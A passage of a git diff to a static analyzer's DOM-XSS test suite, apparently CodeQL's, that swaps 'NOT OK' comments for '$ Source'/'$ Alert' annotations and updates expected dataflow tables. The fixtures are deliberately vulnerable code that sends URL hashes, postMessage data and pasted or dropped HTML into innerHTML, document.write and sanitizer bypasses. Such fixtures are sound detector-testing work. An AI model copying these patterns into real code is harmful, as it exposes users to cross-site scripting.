tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | @@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ -this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK +this.addEventListener('message', function(event) { // $ Source + document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { - document.write(data); // NOT OK +this.addEventListener('message', function({data}) { // $ Source + document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + function foo(x, event, y) { // $ Source + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -1,15 +1,15 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts @@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -5,14 +5,14 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + const html = dataTransfer.getData('text/html'); // $ Source + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,22 +1,22 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..20e71516a9f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,19 +6,19 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; @@ -27,36 +27,36 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,14 +5,14 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 